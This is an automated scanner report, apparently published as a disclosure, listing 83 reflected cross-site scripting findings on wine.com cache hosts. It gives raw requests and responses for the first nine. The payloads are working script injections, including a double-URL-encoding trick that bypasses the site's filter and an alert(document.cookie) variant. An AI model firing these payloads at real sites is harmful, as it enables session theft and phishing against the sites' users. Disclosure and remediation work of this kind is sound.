XSS, DORK, Daily Report, favicon.ico, Cross Site Scripting, CWE-79, CAPEC-86

http://cache.wine.com/favicon.icod1219%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e0ca90fa5de6

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 11:20:15 CST 2011.


The DORK Report


1. Cross-site scripting (reflected)

1.1. http://cache.wine.com/ScriptResource.axd [REST URL parameter 1]

1.2. http://cache.wine.com/WebResource.axd [Lo0P parameter]

1.3. http://cache.wine.com/WebResource.axd [REST URL parameter 1]

1.4. http://cache.wine.com/favicon.ico [REST URL parameter 1]

1.5. http://cache.wine.com/images/DiscoveryTourWineclub.jpg [Lo0P parameter]

1.6. http://cache.wine.com/images/btnAddToCart.png [Lo0P parameter]

1.7. http://cache.wine.com/images/btnSubmit.png [Lo0P parameter]

1.8. http://cache.wine.com/images/btn_continue.gif [Lo0P parameter]

1.9. http://cache.wine.com/images/clear.gif [Lo0P parameter]

1.10. http://cache.wine.com/images/css/HomeNavRtArrow.jpg [Lo0P parameter]

1.11. http://cache.wine.com/images/css/facebookIcon.png [Lo0P parameter]

1.12. http://cache.wine.com/images/css/greyPlus.gif [Lo0P parameter]

1.13. http://cache.wine.com/images/css/iconWineMan.png [Lo0P parameter]

1.14. http://cache.wine.com/images/glo_icon_bubbly_big.gif [Lo0P parameter]

1.15. http://cache.wine.com/images/glo_icon_collectable_big.gif [Lo0P parameter]

1.16. http://cache.wine.com/images/glo_icon_gift_big.gif [Lo0P parameter]

1.17. http://cache.wine.com/images/glo_icon_kosher_big.gif [Lo0P parameter]

1.18. http://cache.wine.com/images/glo_icon_red_big.gif [Lo0P parameter]

1.19. http://cache.wine.com/images/glo_icon_rose_big.gif [Lo0P parameter]

1.20. http://cache.wine.com/images/glo_icon_video_big.gif [Lo0P parameter]

1.21. http://cache.wine.com/images/glo_icon_white_big.gif [Lo0P parameter]

1.22. http://cache.wine.com/images/rating90.gif [Lo0P parameter]

1.23. http://cache.wine.com/images/rating91.gif [Lo0P parameter]

1.24. http://cache.wine.com/images/rating94.gif [Lo0P parameter]

1.25. http://cache.wine.com/images/ratingBH.gif [Lo0P parameter]

1.26. http://cache.wine.com/images/ratingCG.gif [Lo0P parameter]

1.27. http://cache.wine.com/images/ratingJH.gif [Lo0P parameter]

1.28. http://cache.wine.com/images/ratingRP.gif [Lo0P parameter]

1.29. http://cache.wine.com/images/ratingWE.gif [Lo0P parameter]

1.30. http://cache.wine.com/images/ratingWN.gif [Lo0P parameter]

1.31. http://cache.wine.com/images/ratingWP.gif [Lo0P parameter]

1.32. http://cache.wine.com/images/tn_img_bg_fade.gif [Lo0P parameter]

1.33. http://cache.wine.com/images/topnav/imgGlobalHeaderRightBadge.gif [Lo0P parameter]

1.34. http://cache.wine.com/images/topnav/imgGlobalHeaderWineGuyLogo.gif [Lo0P parameter]

1.35. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 1]

1.36. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 2]

1.37. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 3]

1.38. http://cache.wine.com/labels/102688m.jpg [Lo0P parameter]

1.39. http://cache.wine.com/labels/103040m.jpg [Lo0P parameter]

1.40. http://cache.wine.com/labels/106551m.jpg [Lo0P parameter]

1.41. http://cache.wine.com/labels/107565m.jpg [Lo0P parameter]

1.42. http://cache.wine.com/labels/108103m.jpg [Lo0P parameter]

1.43. http://cache.wine.com/labels/108138m.jpg [Lo0P parameter]

1.44. http://cache1.wine.com/ScriptResource.axd [REST URL parameter 1]

1.45. http://cache1.wine.com/WebResource.axd [REST URL parameter 1]

1.46. http://cache1.wine.com/favicon.ico [REST URL parameter 1]

1.47. http://cache1.wine.com/images/90PointRatedWineClub.jpg [Lo0P parameter]

1.48. http://cache1.wine.com/images/WorldWineClub.jpg [Lo0P parameter]

1.49. http://cache1.wine.com/images/btnSearch.gif [Lo0P parameter]

1.50. http://cache1.wine.com/images/css/homeNavBot.gif [Lo0P parameter]

1.51. http://cache1.wine.com/images/css/homeNavBotDark.gif [Lo0P parameter]

1.52. http://cache1.wine.com/images/css/homeNavRtArrow.jpg [Lo0P parameter]

1.53. http://cache1.wine.com/images/css/homeNavTop.gif [Lo0P parameter]

1.54. http://cache1.wine.com/images/css/homeNavTopDark.gif [Lo0P parameter]

1.55. http://cache1.wine.com/images/css/twiiterIcon.png [Lo0P parameter]

1.56. http://cache1.wine.com/images/glo_icon_boutique_big.gif [Lo0P parameter]

1.57. http://cache1.wine.com/images/glo_icon_organic_big.gif [Lo0P parameter]

1.58. http://cache1.wine.com/images/glo_icon_screwcap_big.gif [Lo0P parameter]

1.59. http://cache1.wine.com/images/glo_tn_top_corners_two.gif [Lo0P parameter]

1.60. http://cache1.wine.com/images/gradiantBg.png [Lo0P parameter]

1.61. http://cache1.wine.com/images/homepage/372x105_ipad.jpg [Lo0P parameter]

1.62. http://cache1.wine.com/images/homepage/372x105_stewardship.jpg [Lo0P parameter]

1.63. http://cache1.wine.com/images/homepage/bgkFooter.gif [Lo0P parameter]

1.64. http://cache1.wine.com/images/homepage/bgkSignUpBorder.gif [Lo0P parameter]

1.65. http://cache1.wine.com/images/homepage/btnSignUp.gif [Lo0P parameter]

1.66. http://cache1.wine.com/images/homepage/btnStartShopping.gif [Lo0P parameter]

1.67. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_10shipping.jpg [Lo0P parameter]

1.68. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg [Lo0P parameter]

1.69. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg [Lo0P parameter]

1.70. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg [Lo0P parameter]

1.71. http://cache1.wine.com/images/icnCloseWindow.gif [Lo0P parameter]

1.72. http://cache1.wine.com/images/icon_email.gif [Lo0P parameter]

1.73. http://cache1.wine.com/images/imgCart.gif [Lo0P parameter]

1.74. http://cache1.wine.com/images/logos/wineManLine.gif [Lo0P parameter]

1.75. http://cache1.wine.com/images/rating96.gif [Lo0P parameter]

1.76. http://cache1.wine.com/images/ratingPR.gif [Lo0P parameter]

1.77. http://cache1.wine.com/images/ratingST.gif [Lo0P parameter]

1.78. http://cache1.wine.com/images/ratingWS.gif [Lo0P parameter]

1.79. http://cache1.wine.com/images/stewardship/stewardship_guy_small.gif [Lo0P parameter]

1.80. http://cache1.wine.com/includes/css/defaultsixC.css [Lo0P parameter]

1.81. http://cache1.wine.com/labels/102367m.jpg [Lo0P parameter]

1.82. http://cache1.wine.com/labels/105835m.jpg [Lo0P parameter]

1.83. http://cache1.wine.com/labels/108120m.jpg [Lo0P parameter]



1. Cross-site scripting (reflected)
There are 83 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://cache.wine.com/ScriptResource.axd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f612%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e890c46504 was submitted in the REST URL parameter 1. This input was echoed as 1f612"><script>alert(1)</script>7e890c46504 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ScriptResource.axd1f612%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e890c46504?d=CLw-uActKiwZsy7qP6LIK_i361lkcCysBFdEalT0CZQVEp45H8y0j-gbB1Pb1ejqIJI-rwVWNPV0-XE7U6NZvox7hyZEx0Sl9yA3JsiO8xg1&t=16ab2387 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:18:02 GMT; path=/
Set-Cookie: SessionGUID=1e3937c8%2Da88b%2D4060%2Da1bc%2D35f684a9037c; expires=Tue, 14-Feb-2012 17:18:02 GMT; domain=cache.wine.com; path=/
Content-Length: 33601


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/ScriptResource.axd1f612"><script>alert(1)</script>7e890c46504?d" value="CLw%2DuActKiwZsy7qP6LIK%5Fi361lkcCysBFdEalT0CZQVEp45H8y0j%2DgbB1Pb1ejqIJI%2DrwVWNPV0%2DXE7U6NZvox7hyZEx0Sl9yA3JsiO8xg1" />
...[SNIP]...

1.2. http://cache.wine.com/WebResource.axd [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /WebResource.axd

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload b7166<script>alert(1)</script>ed589c53d0e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebResource.axd?d=kn_xm01GAKIeMJbj40MimA2&t=634118940962881628&Lo0P=b7166<script>alert(1)</script>ed589c53d0e HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmb=32446520; __utmc=32446520; __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 298
Date: Sun, 13 Feb 2011 13:56:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /WebResource.axd?d=kn_xm01GAKIeMJbj40MimA2&t=634118940962881628&Lo0P=b7166<script>alert(1)</script>ed589c53d0e was not found on this server.<P>
...[SNIP]...

1.3. http://cache.wine.com/WebResource.axd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7017%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6530925c923 was submitted in the REST URL parameter 1. This input was echoed as d7017"><script>alert(1)</script>6530925c923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /WebResource.axdd7017%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6530925c923?d=qMvLqAYYlQKxs7VjG11tzg2&t=634110324544165077 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:18:00 GMT; path=/
Set-Cookie: SessionGUID=1e3937c8%2Da88b%2D4060%2Da1bc%2D35f684a9037c; expires=Tue, 14-Feb-2012 17:18:00 GMT; domain=cache.wine.com; path=/
Content-Length: 33513


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/WebResource.axdd7017"><script>alert(1)</script>6530925c923?d" value="qMvLqAYYlQKxs7VjG11tzg2" />
...[SNIP]...

1.4. http://cache.wine.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43239%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e29ad3f559a5 was submitted in the REST URL parameter 1. This input was echoed as 43239"><script>alert(1)</script>29ad3f559a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico43239%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e29ad3f559a5 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Sun, 13 Feb 2011 15:00:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SessionGUID=8527281D%2D77B5%2D4A14%2DAA5A%2D3081A2436700; expires=Mon, 13-Feb-2012 15:00:08 GMT; domain=cache.wine.com; path=/
Set-Cookie: ASPSESSIONIDQCDCRBQQ=PKIDHIPDOOHFFOKHNLDNPEKK; path=/
Content-Length: 33265


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/favicon.ico43239"><script>alert(1)</script>29ad3f559a5" value="" />
...[SNIP]...

1.5. http://cache.wine.com/images/DiscoveryTourWineclub.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/DiscoveryTourWineclub.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 95ed3<script>alert(1)</script>5c02f3e89cb was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/DiscoveryTourWineclub.jpg?Lo0P=95ed3<script>alert(1)</script>5c02f3e89cb HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 268
Date: Mon, 14 Feb 2011 17:16:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/DiscoveryTourWineclub.jpg?Lo0P=95ed3<script>alert(1)</script>5c02f3e89cb was not found on this server.<P>
...[SNIP]...

1.6. http://cache.wine.com/images/btnAddToCart.png [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/btnAddToCart.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 3afa1<script>alert(1)</script>31c929450d5 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/btnAddToCart.png?Lo0P=3afa1<script>alert(1)</script>31c929450d5 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 259
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/btnAddToCart.png?Lo0P=3afa1<script>alert(1)</script>31c929450d5 was not found on this server.<P>
...[SNIP]...

1.7. http://cache.wine.com/images/btnSubmit.png [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/btnSubmit.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload b975b<script>alert(1)</script>c8a0f7e12e3 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/btnSubmit.png?Lo0P=b975b<script>alert(1)</script>c8a0f7e12e3 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmb=32446520.1.10.1297605361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 256
Date: Sun, 13 Feb 2011 13:56:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/btnSubmit.png?Lo0P=b975b<script>alert(1)</script>c8a0f7e12e3 was not found on this server.<P>
...[SNIP]...

1.8. http://cache.wine.com/images/btn_continue.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/btn_continue.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload fb2ee<script>alert(1)</script>10c7f841393 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/btn_continue.gif?Lo0P=fb2ee<script>alert(1)</script>10c7f841393 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 259
Date: Mon, 14 Feb 2011 17:16:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/btn_continue.gif?Lo0P=fb2ee<script>alert(1)</script>10c7f841393 was not found on this server.<P>
...[SNIP]...

1.9. http://cache.wine.com/images/clear.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/clear.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload cd698<script>alert(1)</script>8587fb1d6d3 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/clear.gif?Lo0P=cd698<script>alert(1)</script>8587fb1d6d3 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 252
Date: Mon, 14 Feb 2011 17:16:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/clear.gif?Lo0P=cd698<script>alert(1)</script>8587fb1d6d3 was not found on this server.<P>
...[SNIP]...

1.10. http://cache.wine.com/images/css/HomeNavRtArrow.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/css/HomeNavRtArrow.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload aced8<script>alert(1)</script>ddba18ef896 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

